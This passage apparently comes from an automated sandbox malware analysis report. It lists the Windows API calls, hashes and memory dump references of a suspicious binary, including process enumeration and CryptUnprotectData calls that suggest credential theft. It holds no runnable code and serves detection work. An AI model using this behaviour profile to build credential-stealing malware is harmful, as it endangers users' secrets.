                          • Opcode ID: bdc9e14dfef6edac8f7968be1e131abf835c6d3a2c259c52b3afdf9bd864395c
                          • Instruction ID: c53bbbe441ba6833c3c0c253b4fff46b4c35dbceb4d0d730f26d034b58bf5a48
                          • Opcode Fuzzy Hash: bdc9e14dfef6edac8f7968be1e131abf835c6d3a2c259c52b3afdf9bd864395c
                          • Instruction Fuzzy Hash: 14011275B40318BBEB10DB949C4AFAA7B79FB44B16F104555FA09EB2C0D6B499008B90
                          APIs
                            • Part of subcall function 006471E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006471FE
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00643A96
                          • Process32First.KERNEL32(00000000,00000128), ref: 00643AA9
                          • Process32Next.KERNEL32(00000000,00000128), ref: 00643ABF
                            • Part of subcall function 00647310: lstrlen.KERNEL32(------,00625BEB), ref: 0064731B
                            • Part of subcall function 00647310: lstrcpy.KERNEL32(00000000), ref: 0064733F
                            • Part of subcall function 00647310: lstrcat.KERNEL32(?,------), ref: 00647349
                            • Part of subcall function 00647280: lstrcpy.KERNEL32(00000000), ref: 006472AE
                          • CloseHandle.KERNEL32(00000000), ref: 00643BF7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          • Opcode ID: 3e43a218033b1763301d952f645f7ec06b2ea5725c2f56b69ae74e3632c4e5ea
                          • Instruction ID: 57b1b25e992ce37b6d1959e2f48be0abfde70d3387a5159ae8b949bfb10b70fe
                          • Opcode Fuzzy Hash: 3e43a218033b1763301d952f645f7ec06b2ea5725c2f56b69ae74e3632c4e5ea
                          • Instruction Fuzzy Hash: 4B81F030900725CFD714CF18D988B95BBB2FB54329F29C1A9D4089B3A2D77A9D82CF84
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 0062EA76
                          • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0062EA7E
                          • lstrcat.KERNEL32(0064CFEC,0064CFEC), ref: 0062EB27
                          • lstrcat.KERNEL32(0064CFEC,0064CFEC), ref: 0062EB49
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          • Opcode ID: aa4c24267b36e25d3f800fc4923402310c9a739ff259a9e148e51ff6cc238ac6
                          • Instruction ID: e1ac387091cc794cddfa00482d3390339753f3e9af357e65d98fc87a8193d730
                          • Opcode Fuzzy Hash: aa4c24267b36e25d3f800fc4923402310c9a739ff259a9e148e51ff6cc238ac6
                          • Instruction Fuzzy Hash: A531D575A00219ABDB10DB98EC46FEEB77EEF44716F044175F909E3280DBB55A08CBA1
                          APIs
                          • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 006440CD
                          • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 006440DC
                          • RtlAllocateHeap.NTDLL(00000000), ref: 006440E3
                          • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00644113
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptHeapString$AllocateProcess
                          • String ID:
                          • API String ID: 3825993179-0
                          • Opcode ID: a660d0a42391bd1a2c77c54837d5d57de32d0f23bc32be2da99872e5663cb0c8
                          • Instruction ID: 860b336d51f66dc3c2ce1fac30e43e446ede287518a4a318ef25edb30c1ee69f
                          • Opcode Fuzzy Hash: a660d0a42391bd1a2c77c54837d5d57de32d0f23bc32be2da99872e5663cb0c8
                          • Instruction Fuzzy Hash: BE015A70600205ABDB108FA5DC8ABAABBAEEF84712F108059FE0897340DA719950CBA0
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,0064A3D0,000000FF), ref: 00642B8F
                          • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00642B96
                          • GetLocalTime.KERNEL32(?,?,00000000,0064A3D0,000000FF), ref: 00642BA2
                          • wsprintfA.USER32 ref: 00642BCE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          • Opcode ID: d374296cd14eab0689bd14fbcbc1e46e0c077198e21dbe40844957f1a097a789
                          • Instruction ID: 8aa2e0b3c0e88223f57d0daa5df21b6baa7043f8bea5f08afc802607b556ca75
                          • Opcode Fuzzy Hash: d374296cd14eab0689bd14fbcbc1e46e0c077198e21dbe40844957f1a097a789
                          • Instruction Fuzzy Hash: F8012DB2944628EBCB149BC9DD45BBEB7BCFB4CB12F00011AF645A2280E77C5440C7B1
                          APIs
                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00629B3B
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00629B4A
                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00629B61
                          • LocalFree.KERNEL32 ref: 00629B70
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID:
                          • API String ID: 4291131564-0
                          • Opcode ID: e71478463d7d13bba3a6a1b885c4f302a3e8de681f0c752117afe9909e586f8e
                          • Instruction ID: e63313e9172ce19ca39a0ee3afa8f6f93734531c20005b66285e40bb838e81ce
                          • Opcode Fuzzy Hash: e71478463d7d13bba3a6a1b885c4f302a3e8de681f0c752117afe9909e586f8e
                          • Instruction Fuzzy Hash: E2F01D71380722ABF7305F64AC49F977BA8EF44B52F200514FA49EE2D0D7B89840CAA4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 42=$Vmyk$q.H
                          • API String ID: 0-3240525061
                          • Opcode ID: da3e804b2cb2b05717b1e00b59e1562af92df9e4405ea2dd9e561611018baea4
                          • Instruction ID: b4ca99927c24eb3564302635ade1b77103fa0c94f3a3c0cae8b0deb7563a30b1
                          • Opcode Fuzzy Hash: da3e804b2cb2b05717b1e00b59e1562af92df9e4405ea2dd9e561611018baea4
                          • Instruction Fuzzy Hash: 07B2C1F360C2049FE304AE2DEC8567AFBE9EF98720F16492DEAC5C3744E63558048697
                          APIs
                          • CoCreateInstance.COMBASE(0064B110,00000000,00000001,0064B100,?), ref: 0063CB06
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0063CB46
                          • lstrcpyn.KERNEL32(?,?,00000104), ref: 0063CBC9
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                          • String ID:
                          • API String ID: 1940255200-0
                          • Opcode ID: d25d88e2735c088e422387dd6f0212cca8bc7b4bf3c748992ff65d3b8d2fc664
                          • Instruction ID: d0f4788a5e75ba3bddcceb8465a25b07f61d0a8331779eff7676364b4f548b78
                          • Opcode Fuzzy Hash: d25d88e2735c088e422387dd6f0212cca8bc7b4bf3c748992ff65d3b8d2fc664
                          • Instruction Fuzzy Hash: 97316471A40614AFD710DB94CC86FAAB7B9AF88B10F104184FA04EB2D0D7B1AE44CB90
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00629B9F
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00629BB3
                          • LocalFree.KERNEL32(?), ref: 00629BD7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          • Opcode ID: 2fda9e6035c2fdb35ebc5c4874de21df81f71f1c29414a645a34a073afb2bce4
                          • Instruction ID: 9a48122511bdc647578db0efec2bf6dd7bc4225a4534f9f336b45a047ef2c51f
                          • Opcode Fuzzy Hash: 2fda9e6035c2fdb35ebc5c4874de21df81f71f1c29414a645a34a073afb2bce4
                          • Instruction Fuzzy Hash: E3011D75E41319ABE7109BA4DC45FAFB779EB84B02F104555EA04AB380DBB49A00CBE0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: jQr~$N3
                          • API String ID: 0-1848301192
                          • Opcode ID: b141c219ea1ce1498a1eb9e1aab916f032560f9dbb11336f8aa902021ffdb9f1
                          • Instruction ID: c2d6f1c7632818e6128ca35296e63e770115a2387c67246ace61676b1a932eec
                          • Opcode Fuzzy Hash: b141c219ea1ce1498a1eb9e1aab916f032560f9dbb11336f8aa902021ffdb9f1
                          • Instruction Fuzzy Hash: 905188F7D086008FF304AA29EC9573AB7D5DBE0720F2A863DDA84D73C0E97989054696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: I[{o
                          • API String ID: 0-3061306638
                          • Opcode ID: 815b4fbea0df2d4d0935503411838910503ec1fead4eec6db2f8c2b4e891bd23
                          • Instruction ID: d3714887d3a871de4f3844fed2763f69a8851cae6b1b2037f7b23c32763f0956
                          • Opcode Fuzzy Hash: 815b4fbea0df2d4d0935503411838910503ec1fead4eec6db2f8c2b4e891bd23
                          • Instruction Fuzzy Hash: B161F7F3A0C2045FE314AE69EC85736FBD9DB94320F16853EE6C4C3380E93998418696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
